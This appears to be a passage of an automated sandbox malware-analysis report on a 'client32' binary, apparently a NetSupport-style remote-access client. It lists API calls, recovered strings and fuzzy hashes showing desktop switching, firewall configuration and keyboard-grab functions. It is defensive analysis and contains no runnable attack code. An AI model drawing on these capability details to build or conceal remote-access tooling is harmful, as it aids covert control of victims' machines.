                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$CreateErrorLast$CloseHandle$Type
                                                                                                                                                                                                    • String ID: @$H
                                                                                                                                                                                                    • API String ID: 352418905-104103126
                                                                                                                                                                                                    • Opcode ID: 679a4524956597270a90762de09c9aff5b5ecab20de8695b0132f7cce8310b71
                                                                                                                                                                                                    • Instruction ID: ec9428be4747ff2da4708a1a5f0e83526a3e58a5cf2fe191f00f64c67b9fb349
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 679a4524956597270a90762de09c9aff5b5ecab20de8695b0132f7cce8310b71
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2223531D002CA9BEB528FA4CD81BADFFB5EF05318F240A29E551EB390D7759950CB52
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,BBC4A55B), ref: 1105F575
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalEnterSection
                                                                                                                                                                                                    • String ID: (NULL)$..\ctl32\Config.cpp$Send EV_CONFIGSET from %s@%d$WARNING: *NOT* Sending EV_CONFIGSET from %s@%d$cfg %x: Set [%s]%s=%s$err == 0$idata->hCurrConfig
                                                                                                                                                                                                    • API String ID: 1904992153-2291704020
                                                                                                                                                                                                    • Opcode ID: d4a260db4a74a9a8f8fc78284288d63a35ac426a80f083e0e992cb1f419157db
                                                                                                                                                                                                    • Instruction ID: 7aff06277d8664bd47fe24daf387b215d76634cef051db57f0aa4e34213ea8d6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4a260db4a74a9a8f8fc78284288d63a35ac426a80f083e0e992cb1f419157db
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7ED1C575D0026A9BDB96CF24CC80BE9B7F9BF48704F0441DCE959A7240E774AB84CB92
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,689C67B5), ref: 689B8D6B
                                                                                                                                                                                                      • Part of subcall function 689B4F70: LoadLibraryA.KERNEL32(psapi.dll,?,689B8DC8), ref: 689B4F78
                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 689B8DCB
                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 689B8DD8
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 689B8EBF
                                                                                                                                                                                                      • Part of subcall function 689B4FB0: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 689B4FC4
                                                                                                                                                                                                      • Part of subcall function 689B4FB0: K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,689B8E0D,00000000,?,689B8E0D,00000000,?,00000FA0,?), ref: 689B4FE4
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 689B8EAE
                                                                                                                                                                                                      • Part of subcall function 689B5000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 689B5014
                                                                                                                                                                                                      • Part of subcall function 689B5000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,689B8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 689B5034
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Process$AddressFileLibraryModuleNameProc$CloseCurrentEnumFreeHandleLoadModulesOpen
                                                                                                                                                                                                    • String ID: CLIENT247$NSM247$NSM247Ctl.dll$Set Is247=%d$is247$pcictl_247.dll
                                                                                                                                                                                                    • API String ID: 3567076824-3484705551
                                                                                                                                                                                                    • Opcode ID: 4d09a5f605f08250b46ecb6a58cd99c719ba47dc7416cbc6a18f0fa482d8b66f
                                                                                                                                                                                                    • Instruction ID: 363b1bdb0c155dadfeafd2b1795e203785d0eee6e450614519ed3ab2efe4304c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d09a5f605f08250b46ecb6a58cd99c719ba47dc7416cbc6a18f0fa482d8b66f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C41F675A44219AFDB18DB91ED48FEF73BCEB59748F804064EA15B2240E770DA44CFA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 110883C0: UnhookWindowsHookEx.USER32(?), ref: 110883E3
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 110FFE7C
                                                                                                                                                                                                    • GetThreadDesktop.USER32(00000000), ref: 110FFE83
                                                                                                                                                                                                    • OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 110FFE93
                                                                                                                                                                                                    • SetThreadDesktop.USER32(00000000), ref: 110FFEA0
                                                                                                                                                                                                    • CloseDesktop.USER32(00000000), ref: 110FFEB9
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 110FFEC1
                                                                                                                                                                                                    • CloseDesktop.USER32(00000000), ref: 110FFED7
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 110FFEDF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • OpenDesktop(%s) failed, e=%d, xrefs: 110FFEE7
                                                                                                                                                                                                    • SetThreadDesktop(%s) ok, xrefs: 110FFEAB
                                                                                                                                                                                                    • SetThreadDesktop(%s) failed, e=%d, xrefs: 110FFEC9
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
                                                                                                                                                                                                    • String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
                                                                                                                                                                                                    • API String ID: 2036220054-60805735
                                                                                                                                                                                                    • Opcode ID: 312bc41d0c80e05ecd2e77a132ac577f729ffb3f5c645a3c4c1f69d055c1a107
                                                                                                                                                                                                    • Instruction ID: 156f0d79109f07c40c4ac8670e692553d53260d930ebdb42a1d89f925a608cc0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 312bc41d0c80e05ecd2e77a132ac577f729ffb3f5c645a3c4c1f69d055c1a107
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9811947AF0022767D2116FB06C89B6FBA18AF8561DF104038FA1B85581EF24A94483F3
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115ABA8
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1115ABB5
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1115ABC8
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 11029224
                                                                                                                                                                                                    • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115AC0C
                                                                                                                                                                                                    • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115AC19
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message
                                                                                                                                                                                                    • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                                                                                                                                                    • API String ID: 174411676-1728070458
                                                                                                                                                                                                    • Opcode ID: 60df89256fdbe4fb07ae3e45b32be970c36e3097d10c8cf2f3f63e8d74a38f38
                                                                                                                                                                                                    • Instruction ID: 447bd79fb7e316194c8fbcf3240c79f01d8f25fe8b238cd57140670aacafd43f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60df89256fdbe4fb07ae3e45b32be970c36e3097d10c8cf2f3f63e8d74a38f38
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7811C475D01319AFC720EFFA9DC09AAF7B8FF01319B40462EE56653540EA7095408B5A
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 11134B22
                                                                                                                                                                                                      • Part of subcall function 11095C90: CoInitialize.OLE32(00000000), ref: 11095CA4
                                                                                                                                                                                                      • Part of subcall function 11095C90: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,11134B2B), ref: 11095CBE
                                                                                                                                                                                                      • Part of subcall function 11095C90: CoCreateInstance.OLE32(?,00000000,00000001,111BBFCC,?,?,?,?,?,?,?,11134B2B), ref: 11095CDB
                                                                                                                                                                                                      • Part of subcall function 11095C90: CoUninitialize.OLE32(?,?,?,?,?,?,11134B2B), ref: 11095CF9
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 11134B31
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 11134B89
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize
                                                                                                                                                                                                    • String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
                                                                                                                                                                                                    • API String ID: 1746592401-1270230032
                                                                                                                                                                                                    • Opcode ID: 7f73c592d2f4cebf0d14d0daa45c6ac975457230d299cd01f04b673b457344e7
                                                                                                                                                                                                    • Instruction ID: 780d96002ff1c571f3ab58ca649bc9daa74988097748e2877fc37ba21b2c8ed0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f73c592d2f4cebf0d14d0daa45c6ac975457230d299cd01f04b673b457344e7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C541AE76E0022D9BD720DBB59C41BEBF768DB5531CF0044BAED1997240EA71AA84CFE1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                      • Part of subcall function 11105D40: OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11105E1A
                                                                                                                                                                                                      • Part of subcall function 11105D40: CloseHandle.KERNEL32(00000000), ref: 11105E29
                                                                                                                                                                                                      • Part of subcall function 11105D40: GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11105E3B
                                                                                                                                                                                                      • Part of subcall function 11105D40: LoadLibraryA.KERNEL32(?), ref: 11105E71
                                                                                                                                                                                                      • Part of subcall function 11105D40: GetProcAddress.KERNEL32(?,GrabKM), ref: 11105E9E
                                                                                                                                                                                                      • Part of subcall function 11105D40: GetProcAddress.KERNEL32(?,LoggedOn), ref: 11105EB6
                                                                                                                                                                                                    • GetStockObject.GDI32(0000000D), ref: 11030672
                                                                                                                                                                                                    • GetObjectA.GDI32(00000000,0000003C,?), ref: 11030682
                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C0
                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C6
                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(023A8D48,00001388), ref: 11030746
                                                                                                                                                                                                    • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 11030778
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressErrorModeObjectProc$CloseDirectoryEventExchangeHandleInterlockedLibraryLoadOpenStockSystemwsprintf
                                                                                                                                                                                                    • String ID: .%d$Error %s unloading audiocap dll$pcicl32
                                                                                                                                                                                                    • API String ID: 4033853999-3899566344
                                                                                                                                                                                                    • Opcode ID: 51ddca8647ab57187e0e1c166896a53c967c89ca25be28915a6d1b4060b12241
                                                                                                                                                                                                    • Instruction ID: 7e43821cc75c177b4768292a53131964eea8ecc700feb9324c3a072739083bb6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51ddca8647ab57187e0e1c166896a53c967c89ca25be28915a6d1b4060b12241
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B291F8B4D06359DEEF02CBF488447ADFEF6AB8430CF1041AAD445A7289FB755A44CB52
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,BBC4A55B,?,00000000,00000001), ref: 11158267
                                                                                                                                                                                                    • CoCreateInstance.OLE32(111C06FC,00000000,00000017,111C062C,?), ref: 11158287
                                                                                                                                                                                                    • wsprintfW.USER32 ref: 111582A7
                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 111582B3
                                                                                                                                                                                                    • wsprintfW.USER32 ref: 11158367
                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 11158408
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
